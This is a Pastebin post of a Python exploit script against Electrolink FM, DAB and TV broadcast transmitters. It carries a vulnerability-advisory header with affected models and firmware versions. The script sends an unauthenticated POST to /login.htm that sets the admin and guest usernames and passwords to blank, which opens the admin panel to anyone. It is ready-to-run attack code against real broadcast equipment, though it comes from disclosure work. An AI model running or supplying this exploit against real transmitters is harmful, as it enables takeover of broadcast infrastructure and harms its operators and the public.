Advertisement
FlyFar

Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal

Feb 2nd, 2024
822
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.22 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python
  2. #
  3. #
  4. # Electrolink FM/DAB/TV Transmitter Remote Authentication Removal
  5. #
  6. #
  7. # Vendor: Electrolink s.r.l.
  8. # Product web page: https://www.electrolink.com
  9. # Affected version: 10W, 100W, 250W, Compact DAB Transmitter
  10. #                   500W, 1kW, 2kW Medium DAB Transmitter
  11. #                   2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
  12. #                   100W, 500W, 1kW, 2kW Compact FM Transmitter
  13. #                   3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
  14. #                   15W - 40kW Digital FM Transmitter
  15. #                   BI, BIII VHF TV Transmitter
  16. #                   10W - 5kW UHF TV Transmitter
  17. #                   Web version: 01.09, 01.08, 01.07
  18. #                   Display version: 1.4, 1.2
  19. #                   Control unit version: 01.06, 01.04, 01.03
  20. #                   Firmware version: 2.1
  21. #
  22. # Summary: Since 1990 Electrolink has been dealing with design and
  23. # manufacturing of advanced technologies for radio and television
  24. # broadcasting. The most comprehensive products range includes: FM
  25. # Transmitters, DAB Transmitters, TV Transmitters for analogue and
  26. # digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
  27. # DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
  28. # switches, Manual patch panels, RF power meters, Rigid line and
  29. # accessories. A professional solution that meets broadcasters needs
  30. # from small community television or radio to big government networks.
  31. #
  32. # Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
  33. # touch-screen display and in-built state of the art DAB modulator,
  34. # EDI input and GPS receiver. All transmitters are equipped with a
  35. # state-of-the art DAB modulator with excellent performances,
  36. # self-protected and self-controlled amplifiers ensure trouble-free
  37. # non-stop operation.
  38. #
  39. # 100W, 500W, 1kW and 2kW power range available on compact 2U and
  40. # 3U 19" frame. Built-in stereo coder, touch screen display and
  41. # efficient low noise air cooling system. Available models: 3kW,
  42. # 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
  43. # with fully broadband solid state amplifiers and an efficient
  44. # low-noise air cooling system.
  45. #
  46. # FM digital modulator with excellent specifications, built-in
  47. # stereo and RDS coder. Digital deviation limiter together with
  48. # ASI and SDI inputs are available. These transmitters are ready
  49. # for ISOFREQUENCY networks.
  50. #
  51. # Available for VHF BI and VHF BIII operation with robust desing
  52. # and user-friendly local and remote control. Multi-standard UHF
  53. # TV transmitters from 10W up to 5kW with efficient low noise air
  54. # cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
  55. # and ISDB-Tb available.
  56. #
  57. # Desc: The application is vulnerable to an unauthenticated
  58. # parameter manipulation that allows an attacker to set the
  59. # credentials to blank giving her access to the admin panel.
  60. # Also vulnerable to account takeover and arbitrary password
  61. # change.
  62. #
  63. # Tested on: Mbedthis-Appweb/12.5.0
  64. #            Mbedthis-Appweb/12.0.0
  65. #
  66. #
  67. # Vulnerability discovered by Neurogenesia
  68. # Macedonian Information Security Research & Development Laboratory
  69. # Zero Science Lab - https://www.zeroscience.mk - @zeroscience
  70. #
  71. #
  72. # Advisory ID: ZSL-2023-5792
  73. # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php
  74. #
  75. #
  76. # 30.06.2023
  77. #
  78. #
  79.  
  80.  
  81. import datetime
  82. import requests
  83.  
  84. dt = datetime.datetime.now()
  85. dt = dt.strftime('%d.%m.%Y %H:%M:%S')
  86. nul = ''
  87.  
  88. print('Starting transmitter exploit at', dt)
  89.  
  90. ip = input('Enter transmitter ip: ')
  91. if 'http' not in ip:
  92.     ip = 'http://' + ip
  93.  
  94. ep = '/login.htm'
  95. url = ip + ep
  96.  
  97. signature = {'Accept-Encoding' : 'gzip, deflate',
  98.              'Accept-Language' : 'ku-MK,en;q=0.1806',
  99.                   'User-Agent' : 'Broadcastso/B.B',
  100.                   'Connection' : 'keep-alive'
  101.              }
  102. # ----------------- Line breaker v0.17 -----------------
  103. postd = {    'adminuser' : nul,
  104.              'guestuser' : nul,
  105.          'adminpassword' : nul,
  106.          'guestpassword' : nul
  107.          }
  108.  
  109. print('Removing security control...')
  110. r = requests.post(url, data = postd, headers = signature)
  111. if r.status_code == 200:
  112.     print('Done. Go and "Login".')
  113. else:
  114.     print('Error')
  115. exit(-4)
  116.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement